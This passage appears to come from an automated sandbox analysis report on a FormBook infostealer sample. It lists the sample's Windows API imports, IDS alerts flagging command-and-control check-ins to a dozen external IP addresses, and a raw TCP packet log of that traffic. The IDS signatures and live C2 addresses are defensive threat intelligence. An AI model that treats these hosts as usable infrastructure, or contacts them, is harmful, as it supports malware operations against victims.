                                                                                  ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                                                  SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                  ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                                                  OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                                                                  Possible Origin

                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                  EnglishGreat Britain

                                                                                  Network Behavior

                                                                                  Suricata IDS Alerts

                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                  2024-12-12T00:18:31.734026+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.5497403.33.130.19080TCP
                                                                                  2024-12-12T00:18:48.956793+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549776161.97.142.14480TCP
                                                                                  2024-12-12T00:18:51.613514+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549782161.97.142.14480TCP
                                                                                  2024-12-12T00:18:54.046754+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549789161.97.142.14480TCP
                                                                                  2024-12-12T00:18:56.671115+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549795161.97.142.14480TCP
                                                                                  2024-12-12T00:19:03.680032+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54981184.32.84.3280TCP
                                                                                  2024-12-12T00:19:06.350235+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54981784.32.84.3280TCP
                                                                                  2024-12-12T00:19:09.037215+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54982484.32.84.3280TCP
                                                                                  2024-12-12T00:19:11.739098+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.54983484.32.84.3280TCP
                                                                                  2024-12-12T00:19:19.281036+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549850124.71.162.2180TCP
                                                                                  2024-12-12T00:19:22.002152+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549856124.71.162.2180TCP
                                                                                  2024-12-12T00:19:24.709648+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549864124.71.162.2180TCP
                                                                                  2024-12-12T00:19:27.352460+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549873124.71.162.2180TCP
                                                                                  2024-12-12T00:19:34.784764+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549889150.109.11.24780TCP
                                                                                  2024-12-12T00:19:37.440962+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549896150.109.11.24780TCP
                                                                                  2024-12-12T00:19:40.097013+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549902150.109.11.24780TCP
                                                                                  2024-12-12T00:19:42.778154+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549911150.109.11.24780TCP
                                                                                  2024-12-12T00:19:50.045715+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549929173.208.249.15580TCP
                                                                                  2024-12-12T00:19:52.710837+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549935173.208.249.15580TCP
                                                                                  2024-12-12T00:19:55.398864+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549941173.208.249.15580TCP
                                                                                  2024-12-12T00:19:58.045150+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549951173.208.249.15580TCP
                                                                                  2024-12-12T00:20:04.998936+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549967209.74.79.4280TCP
                                                                                  2024-12-12T00:20:07.656869+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549974209.74.79.4280TCP
                                                                                  2024-12-12T00:20:10.574431+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549980209.74.79.4280TCP
                                                                                  2024-12-12T00:20:12.985064+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549986209.74.79.4280TCP
                                                                                  2024-12-12T00:20:21.003076+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55000118.139.62.22680TCP
                                                                                  2024-12-12T00:20:23.660886+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55000218.139.62.22680TCP
                                                                                  2024-12-12T00:20:26.315495+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55000318.139.62.22680TCP
                                                                                  2024-12-12T00:20:29.047423+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.55000418.139.62.22680TCP
                                                                                  2024-12-12T00:20:36.572504+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550005101.32.205.6180TCP
                                                                                  2024-12-12T00:20:39.237742+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550006101.32.205.6180TCP
                                                                                  2024-12-12T00:20:41.893843+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550007101.32.205.6180TCP
                                                                                  2024-12-12T00:20:44.566392+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550008101.32.205.6180TCP
                                                                                  2024-12-12T00:20:54.154006+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55000938.6.78.23580TCP
                                                                                  2024-12-12T00:20:56.845702+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55001038.6.78.23580TCP
                                                                                  2024-12-12T00:20:59.519970+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55001138.6.78.23580TCP
                                                                                  2024-12-12T00:21:02.186163+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.55001238.6.78.23580TCP
                                                                                  2024-12-12T00:21:09.175863+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5500133.125.36.17580TCP
                                                                                  2024-12-12T00:21:11.851422+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5500143.125.36.17580TCP
                                                                                  2024-12-12T00:21:14.495151+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5500153.125.36.17580TCP
                                                                                  2024-12-12T00:21:17.158405+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.5500163.125.36.17580TCP
                                                                                  2024-12-12T00:21:24.143527+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550017172.67.176.24080TCP
                                                                                  2024-12-12T00:21:26.799915+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550018172.67.176.24080TCP
                                                                                  2024-12-12T00:21:29.458673+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550019172.67.176.24080TCP
                                                                                  2024-12-12T00:22:10.730053+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550020172.67.176.24080TCP
                                                                                  2024-12-12T00:22:18.180926+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55002145.41.80.14480TCP

                                                                                  Network Port Distribution

                                                                                  TCP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Dec 12, 2024 00:18:30.516129017 CET4974080192.168.2.53.33.130.190
                                                                                  Dec 12, 2024 00:18:30.635577917 CET80497403.33.130.190192.168.2.5
                                                                                  Dec 12, 2024 00:18:30.635677099 CET4974080192.168.2.53.33.130.190
                                                                                  Dec 12, 2024 00:18:30.643790960 CET4974080192.168.2.53.33.130.190
                                                                                  Dec 12, 2024 00:18:30.763384104 CET80497403.33.130.190192.168.2.5
                                                                                  Dec 12, 2024 00:18:31.733844995 CET80497403.33.130.190192.168.2.5
                                                                                  Dec 12, 2024 00:18:31.733886003 CET80497403.33.130.190192.168.2.5
                                                                                  Dec 12, 2024 00:18:31.734025955 CET4974080192.168.2.53.33.130.190
                                                                                  Dec 12, 2024 00:18:31.737024069 CET4974080192.168.2.53.33.130.190
                                                                                  Dec 12, 2024 00:18:31.857561111 CET80497403.33.130.190192.168.2.5
                                                                                  Dec 12, 2024 00:18:47.313631058 CET4977680192.168.2.5161.97.142.144
                                                                                  Dec 12, 2024 00:18:47.435051918 CET8049776161.97.142.144192.168.2.5
                                                                                  Dec 12, 2024 00:18:47.435345888 CET4977680192.168.2.5161.97.142.144
                                                                                  Dec 12, 2024 00:18:47.449197054 CET4977680192.168.2.5161.97.142.144
                                                                                  Dec 12, 2024 00:18:47.570349932 CET8049776161.97.142.144192.168.2.5
                                                                                  Dec 12, 2024 00:18:48.956793070 CET4977680192.168.2.5161.97.142.144
                                                                                  Dec 12, 2024 00:18:49.076514006 CET8049776161.97.142.144192.168.2.5
                                                                                  Dec 12, 2024 00:18:49.076602936 CET4977680192.168.2.5161.97.142.144
                                                                                  Dec 12, 2024 00:18:49.975003958 CET4978280192.168.2.5161.97.142.144
                                                                                  Dec 12, 2024 00:18:50.094824076 CET8049782161.97.142.144192.168.2.5
                                                                                  Dec 12, 2024 00:18:50.094984055 CET4978280192.168.2.5161.97.142.144
                                                                                  Dec 12, 2024 00:18:50.110093117 CET4978280192.168.2.5161.97.142.144
                                                                                  Dec 12, 2024 00:18:50.229675055 CET8049782161.97.142.144192.168.2.5
                                                                                  Dec 12, 2024 00:18:51.613513947 CET4978280192.168.2.5161.97.142.144
                                                                                  Dec 12, 2024 00:18:51.733659029 CET8049782161.97.142.144192.168.2.5
                                                                                  Dec 12, 2024 00:18:51.733798981 CET4978280192.168.2.5161.97.142.144
                                                                                  Dec 12, 2024 00:18:52.644486904 CET4978980192.168.2.5161.97.142.144
                                                                                  Dec 12, 2024 00:18:52.763864040 CET8049789161.97.142.144192.168.2.5
                                                                                  Dec 12, 2024 00:18:52.763969898 CET4978980192.168.2.5161.97.142.144
                                                                                  Dec 12, 2024 00:18:52.778666973 CET4978980192.168.2.5161.97.142.144
                                                                                  Dec 12, 2024 00:18:52.897998095 CET8049789161.97.142.144192.168.2.5
                                                                                  Dec 12, 2024 00:18:52.898037910 CET8049789161.97.142.144192.168.2.5
                                                                                  Dec 12, 2024 00:18:54.046468973 CET8049789161.97.142.144192.168.2.5
                                                                                  Dec 12, 2024 00:18:54.046612024 CET8049789161.97.142.144192.168.2.5
                                                                                  Dec 12, 2024 00:18:54.046668053 CET8049789161.97.142.144192.168.2.5
                                                                                  Dec 12, 2024 00:18:54.046753883 CET4978980192.168.2.5161.97.142.144
                                                                                  Dec 12, 2024 00:18:54.046909094 CET4978980192.168.2.5161.97.142.144
                                                                                  Dec 12, 2024 00:18:54.284904957 CET4978980192.168.2.5161.97.142.144
                                                                                  Dec 12, 2024 00:18:55.304740906 CET4979580192.168.2.5161.97.142.144
                                                                                  Dec 12, 2024 00:18:55.424127102 CET8049795161.97.142.144192.168.2.5
                                                                                  Dec 12, 2024 00:18:55.424264908 CET4979580192.168.2.5161.97.142.144
                                                                                  Dec 12, 2024 00:18:55.433875084 CET4979580192.168.2.5161.97.142.144
                                                                                  Dec 12, 2024 00:18:55.553216934 CET8049795161.97.142.144192.168.2.5
                                                                                  Dec 12, 2024 00:18:56.670917988 CET8049795161.97.142.144192.168.2.5
                                                                                  Dec 12, 2024 00:18:56.670947075 CET8049795161.97.142.144192.168.2.5
                                                                                  Dec 12, 2024 00:18:56.670959949 CET8049795161.97.142.144192.168.2.5
                                                                                  Dec 12, 2024 00:18:56.671051979 CET8049795161.97.142.144192.168.2.5
                                                                                  Dec 12, 2024 00:18:56.671114922 CET4979580192.168.2.5161.97.142.144
                                                                                  Dec 12, 2024 00:18:56.671207905 CET4979580192.168.2.5161.97.142.144
                                                                                  Dec 12, 2024 00:18:56.675672054 CET4979580192.168.2.5161.97.142.144
                                                                                  Dec 12, 2024 00:18:56.796274900 CET8049795161.97.142.144192.168.2.5
                                                                                  Dec 12, 2024 00:19:02.457987070 CET4981180192.168.2.584.32.84.32
                                                                                  Dec 12, 2024 00:19:02.579817057 CET804981184.32.84.32192.168.2.5
                                                                                  Dec 12, 2024 00:19:02.579968929 CET4981180192.168.2.584.32.84.32
                                                                                  Dec 12, 2024 00:19:02.598135948 CET4981180192.168.2.584.32.84.32
                                                                                  Dec 12, 2024 00:19:02.718694925 CET804981184.32.84.32192.168.2.5
                                                                                  Dec 12, 2024 00:19:03.679753065 CET804981184.32.84.32192.168.2.5
                                                                                  Dec 12, 2024 00:19:03.680032015 CET4981180192.168.2.584.32.84.32
                                                                                  Dec 12, 2024 00:19:04.113233089 CET4981180192.168.2.584.32.84.32
                                                                                  Dec 12, 2024 00:19:04.233128071 CET804981184.32.84.32192.168.2.5
                                                                                  Dec 12, 2024 00:19:05.132798910 CET4981780192.168.2.584.32.84.32
                                                                                  Dec 12, 2024 00:19:05.252007961 CET804981784.32.84.32192.168.2.5
                                                                                  Dec 12, 2024 00:19:05.252170086 CET4981780192.168.2.584.32.84.32
                                                                                  Dec 12, 2024 00:19:05.270868063 CET4981780192.168.2.584.32.84.32
                                                                                  Dec 12, 2024 00:19:05.390355110 CET804981784.32.84.32192.168.2.5
                                                                                  Dec 12, 2024 00:19:06.350045919 CET804981784.32.84.32192.168.2.5
                                                                                  Dec 12, 2024 00:19:06.350234985 CET4981780192.168.2.584.32.84.32
                                                                                  Dec 12, 2024 00:19:06.784832001 CET4981780192.168.2.584.32.84.32
                                                                                  Dec 12, 2024 00:19:06.906361103 CET804981784.32.84.32192.168.2.5
                                                                                  Dec 12, 2024 00:19:07.819020033 CET4982480192.168.2.584.32.84.32
                                                                                  Dec 12, 2024 00:19:07.939280987 CET804982484.32.84.32192.168.2.5
                                                                                  Dec 12, 2024 00:19:07.939539909 CET4982480192.168.2.584.32.84.32
                                                                                  Dec 12, 2024 00:19:07.958623886 CET4982480192.168.2.584.32.84.32
                                                                                  Dec 12, 2024 00:19:08.079368114 CET804982484.32.84.32192.168.2.5
                                                                                  Dec 12, 2024 00:19:08.079404116 CET804982484.32.84.32192.168.2.5
                                                                                  Dec 12, 2024 00:19:09.037125111 CET804982484.32.84.32192.168.2.5
                                                                                  Dec 12, 2024 00:19:09.037214994 CET4982480192.168.2.584.32.84.32
                                                                                  Dec 12, 2024 00:19:09.472280979 CET4982480192.168.2.584.32.84.32
                                                                                  Dec 12, 2024 00:19:09.594629049 CET804982484.32.84.32192.168.2.5
                                                                                  Dec 12, 2024 00:19:10.515654087 CET4983480192.168.2.584.32.84.32
                                                                                  Dec 12, 2024 00:19:10.637370110 CET804983484.32.84.32192.168.2.5
                                                                                  Dec 12, 2024 00:19:10.637641907 CET4983480192.168.2.584.32.84.32
                                                                                  Dec 12, 2024 00:19:10.651905060 CET4983480192.168.2.584.32.84.32
                                                                                  Dec 12, 2024 00:19:10.773556948 CET804983484.32.84.32192.168.2.5
                                                                                  Dec 12, 2024 00:19:11.738887072 CET804983484.32.84.32192.168.2.5
                                                                                  Dec 12, 2024 00:19:11.738903046 CET804983484.32.84.32192.168.2.5
                                                                                  Dec 12, 2024 00:19:11.738919020 CET804983484.32.84.32192.168.2.5
                                                                                  Dec 12, 2024 00:19:11.739078999 CET804983484.32.84.32192.168.2.5
                                                                                  Dec 12, 2024 00:19:11.739093065 CET804983484.32.84.32192.168.2.5
                                                                                  Dec 12, 2024 00:19:11.739098072 CET4983480192.168.2.584.32.84.32
                                                                                  Dec 12, 2024 00:19:11.739108086 CET804983484.32.84.32192.168.2.5
                                                                                  Dec 12, 2024 00:19:11.739124060 CET804983484.32.84.32192.168.2.5
                                                                                  Dec 12, 2024 00:19:11.739264965 CET4983480192.168.2.584.32.84.32
                                                                                  Dec 12, 2024 00:19:11.739264965 CET4983480192.168.2.584.32.84.32
                                                                                  Dec 12, 2024 00:19:11.739656925 CET804983484.32.84.32192.168.2.5
                                                                                  Dec 12, 2024 00:19:11.739672899 CET804983484.32.84.32192.168.2.5
                                                                                  Dec 12, 2024 00:19:11.739686966 CET804983484.32.84.32192.168.2.5
                                                                                  Dec 12, 2024 00:19:11.739712954 CET4983480192.168.2.584.32.84.32
                                                                                  Dec 12, 2024 00:19:11.739801884 CET4983480192.168.2.584.32.84.32
                                                                                  Dec 12, 2024 00:19:11.746840954 CET804983484.32.84.32192.168.2.5
                                                                                  Dec 12, 2024 00:19:11.746958017 CET4983480192.168.2.584.32.84.32
                                                                                  Dec 12, 2024 00:19:11.748136044 CET4983480192.168.2.584.32.84.32
                                                                                  Dec 12, 2024 00:19:11.867935896 CET804983484.32.84.32192.168.2.5
                                                                                  Dec 12, 2024 00:19:17.679075003 CET4985080192.168.2.5124.71.162.21
                                                                                  Dec 12, 2024 00:19:17.799947977 CET8049850124.71.162.21192.168.2.5
                                                                                  Dec 12, 2024 00:19:17.800096035 CET4985080192.168.2.5124.71.162.21
                                                                                  Dec 12, 2024 00:19:17.815320969 CET4985080192.168.2.5124.71.162.21
                                                                                  Dec 12, 2024 00:19:17.936325073 CET8049850124.71.162.21192.168.2.5
                                                                                  Dec 12, 2024 00:19:19.280900002 CET8049850124.71.162.21192.168.2.5
                                                                                  Dec 12, 2024 00:19:19.280961990 CET8049850124.71.162.21192.168.2.5
                                                                                  Dec 12, 2024 00:19:19.281035900 CET4985080192.168.2.5124.71.162.21
                                                                                  Dec 12, 2024 00:19:19.331598997 CET4985080192.168.2.5124.71.162.21
                                                                                  Dec 12, 2024 00:19:20.397514105 CET4985680192.168.2.5124.71.162.21
                                                                                  Dec 12, 2024 00:19:20.518379927 CET8049856124.71.162.21192.168.2.5
                                                                                  Dec 12, 2024 00:19:20.518501997 CET4985680192.168.2.5124.71.162.21
                                                                                  Dec 12, 2024 00:19:20.532223940 CET4985680192.168.2.5124.71.162.21
                                                                                  Dec 12, 2024 00:19:20.653152943 CET8049856124.71.162.21192.168.2.5
                                                                                  Dec 12, 2024 00:19:22.001977921 CET8049856124.71.162.21192.168.2.5
                                                                                  Dec 12, 2024 00:19:22.002048016 CET8049856124.71.162.21192.168.2.5
                                                                                  Dec 12, 2024 00:19:22.002151966 CET4985680192.168.2.5124.71.162.21
                                                                                  Dec 12, 2024 00:19:22.034986973 CET4985680192.168.2.5124.71.162.21
                                                                                  Dec 12, 2024 00:19:23.085546970 CET4986480192.168.2.5124.71.162.21
                                                                                  Dec 12, 2024 00:19:23.205087900 CET8049864124.71.162.21192.168.2.5
                                                                                  Dec 12, 2024 00:19:23.205200911 CET4986480192.168.2.5124.71.162.21
                                                                                  Dec 12, 2024 00:19:23.218812943 CET4986480192.168.2.5124.71.162.21
                                                                                  Dec 12, 2024 00:19:23.340223074 CET8049864124.71.162.21192.168.2.5
                                                                                  Dec 12, 2024 00:19:23.343019009 CET8049864124.71.162.21192.168.2.5
                                                                                  Dec 12, 2024 00:19:24.709273100 CET8049864124.71.162.21192.168.2.5
                                                                                  Dec 12, 2024 00:19:24.709472895 CET8049864124.71.162.21192.168.2.5
                                                                                  Dec 12, 2024 00:19:24.709647894 CET4986480192.168.2.5124.71.162.21
                                                                                  Dec 12, 2024 00:19:24.722141981 CET4986480192.168.2.5124.71.162.21
                                                                                  Dec 12, 2024 00:19:25.740930080 CET4987380192.168.2.5124.71.162.21
                                                                                  Dec 12, 2024 00:19:25.862457037 CET8049873124.71.162.21192.168.2.5
                                                                                  Dec 12, 2024 00:19:25.862634897 CET4987380192.168.2.5124.71.162.21
                                                                                  Dec 12, 2024 00:19:25.874519110 CET4987380192.168.2.5124.71.162.21
                                                                                  Dec 12, 2024 00:19:25.996028900 CET8049873124.71.162.21192.168.2.5
                                                                                  Dec 12, 2024 00:19:27.352281094 CET8049873124.71.162.21192.168.2.5
                                                                                  Dec 12, 2024 00:19:27.352310896 CET8049873124.71.162.21192.168.2.5
                                                                                  Dec 12, 2024 00:19:27.352459908 CET4987380192.168.2.5124.71.162.21
                                                                                  Dec 12, 2024 00:19:27.355815887 CET4987380192.168.2.5124.71.162.21
                                                                                  Dec 12, 2024 00:19:27.596137047 CET8049873124.71.162.21192.168.2.5
                                                                                  Dec 12, 2024 00:19:33.137367964 CET4988980192.168.2.5150.109.11.247
                                                                                  Dec 12, 2024 00:19:33.258388996 CET8049889150.109.11.247192.168.2.5
                                                                                  Dec 12, 2024 00:19:33.258585930 CET4988980192.168.2.5150.109.11.247
                                                                                  Dec 12, 2024 00:19:33.273760080 CET4988980192.168.2.5150.109.11.247
                                                                                  Dec 12, 2024 00:19:33.394870996 CET8049889150.109.11.247192.168.2.5
                                                                                  Dec 12, 2024 00:19:34.784764051 CET4988980192.168.2.5150.109.11.247
                                                                                  Dec 12, 2024 00:19:34.830887079 CET8049889150.109.11.247192.168.2.5
                                                                                  Dec 12, 2024 00:19:34.830900908 CET8049889150.109.11.247192.168.2.5
                                                                                  Dec 12, 2024 00:19:34.831163883 CET4988980192.168.2.5150.109.11.247
                                                                                  Dec 12, 2024 00:19:34.831163883 CET4988980192.168.2.5150.109.11.247
                                                                                  Dec 12, 2024 00:19:34.906331062 CET8049889150.109.11.247192.168.2.5
                                                                                  Dec 12, 2024 00:19:34.906589031 CET4988980192.168.2.5150.109.11.247
                                                                                  Dec 12, 2024 00:19:35.803070068 CET4989680192.168.2.5150.109.11.247
                                                                                  Dec 12, 2024 00:19:35.924730062 CET8049896150.109.11.247192.168.2.5
                                                                                  Dec 12, 2024 00:19:35.924835920 CET4989680192.168.2.5150.109.11.247
                                                                                  Dec 12, 2024 00:19:35.938417912 CET4989680192.168.2.5150.109.11.247
                                                                                  Dec 12, 2024 00:19:36.060061932 CET8049896150.109.11.247192.168.2.5
                                                                                  Dec 12, 2024 00:19:37.440962076 CET4989680192.168.2.5150.109.11.247
                                                                                  Dec 12, 2024 00:19:37.480165005 CET8049896150.109.11.247192.168.2.5
                                                                                  Dec 12, 2024 00:19:37.480211020 CET8049896150.109.11.247192.168.2.5
                                                                                  Dec 12, 2024 00:19:37.480284929 CET4989680192.168.2.5150.109.11.247
                                                                                  Dec 12, 2024 00:19:37.480284929 CET4989680192.168.2.5150.109.11.247
                                                                                  Dec 12, 2024 00:19:37.561805010 CET8049896150.109.11.247192.168.2.5
                                                                                  Dec 12, 2024 00:19:37.561903000 CET4989680192.168.2.5150.109.11.247
                                                                                  Dec 12, 2024 00:19:38.459414005 CET4990280192.168.2.5150.109.11.247
                                                                                  Dec 12, 2024 00:19:38.579061031 CET8049902150.109.11.247192.168.2.5
                                                                                  Dec 12, 2024 00:19:38.579226971 CET4990280192.168.2.5150.109.11.247
                                                                                  Dec 12, 2024 00:19:38.593681097 CET4990280192.168.2.5150.109.11.247
                                                                                  Dec 12, 2024 00:19:38.713059902 CET8049902150.109.11.247192.168.2.5
                                                                                  Dec 12, 2024 00:19:38.713165045 CET8049902150.109.11.247192.168.2.5
                                                                                  Dec 12, 2024 00:19:40.097012997 CET4990280192.168.2.5150.109.11.247
                                                                                  Dec 12, 2024 00:19:40.287234068 CET8049902150.109.11.247192.168.2.5
                                                                                  Dec 12, 2024 00:19:40.287270069 CET8049902150.109.11.247192.168.2.5
                                                                                  Dec 12, 2024 00:19:40.287308931 CET4990280192.168.2.5150.109.11.247
                                                                                  Dec 12, 2024 00:19:40.287338972 CET4990280192.168.2.5150.109.11.247
                                                                                  Dec 12, 2024 00:19:40.287698030 CET8049902150.109.11.247192.168.2.5
                                                                                  Dec 12, 2024 00:19:40.287755966 CET4990280192.168.2.5150.109.11.247
                                                                                  Dec 12, 2024 00:19:40.393037081 CET8049902150.109.11.247192.168.2.5
                                                                                  Dec 12, 2024 00:19:40.393094063 CET4990280192.168.2.5150.109.11.247
                                                                                  Dec 12, 2024 00:19:41.115358114 CET4991180192.168.2.5150.109.11.247
                                                                                  Dec 12, 2024 00:19:41.234689951 CET8049911150.109.11.247192.168.2.5
                                                                                  Dec 12, 2024 00:19:41.235446930 CET4991180192.168.2.5150.109.11.247
                                                                                  Dec 12, 2024 00:19:41.243158102 CET4991180192.168.2.5150.109.11.247
                                                                                  Dec 12, 2024 00:19:41.362459898 CET8049911150.109.11.247192.168.2.5
                                                                                  Dec 12, 2024 00:19:42.777731895 CET8049911150.109.11.247192.168.2.5
                                                                                  Dec 12, 2024 00:19:42.778078079 CET8049911150.109.11.247192.168.2.5
                                                                                  Dec 12, 2024 00:19:42.778153896 CET4991180192.168.2.5150.109.11.247
                                                                                  Dec 12, 2024 00:19:42.780942917 CET4991180192.168.2.5150.109.11.247
                                                                                  Dec 12, 2024 00:19:42.900417089 CET8049911150.109.11.247192.168.2.5
                                                                                  Dec 12, 2024 00:19:48.762160063 CET4992980192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:48.883758068 CET8049929173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:48.883966923 CET4992980192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:48.903033972 CET4992980192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:49.024519920 CET8049929173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:50.045525074 CET8049929173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:50.045655966 CET8049929173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:50.045667887 CET8049929173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:50.045715094 CET4992980192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:50.046139002 CET8049929173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:50.046154022 CET8049929173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:50.046169996 CET8049929173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:50.046181917 CET8049929173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:50.046185970 CET4992980192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:50.046217918 CET4992980192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:50.046696901 CET8049929173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:50.046706915 CET8049929173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:50.046716928 CET8049929173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:50.046750069 CET4992980192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:50.046768904 CET4992980192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:50.051239967 CET8049929173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:50.051309109 CET4992980192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:50.409600973 CET4992980192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:51.427686930 CET4993580192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:51.549413919 CET8049935173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:51.549604893 CET4993580192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:51.565583944 CET4993580192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:51.687019110 CET8049935173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:52.710707903 CET8049935173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:52.710783005 CET8049935173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:52.710794926 CET8049935173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:52.710836887 CET4993580192.168.2.5173.208.249.155
                                                                                  Dec 12, 2024 00:19:52.711070061 CET8049935173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:52.711081028 CET8049935173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:52.711090088 CET8049935173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:52.711100101 CET8049935173.208.249.155192.168.2.5
                                                                                  Dec 12, 2024 00:19:52.711116076 CET4993580192.168.2.5173.208.249.155
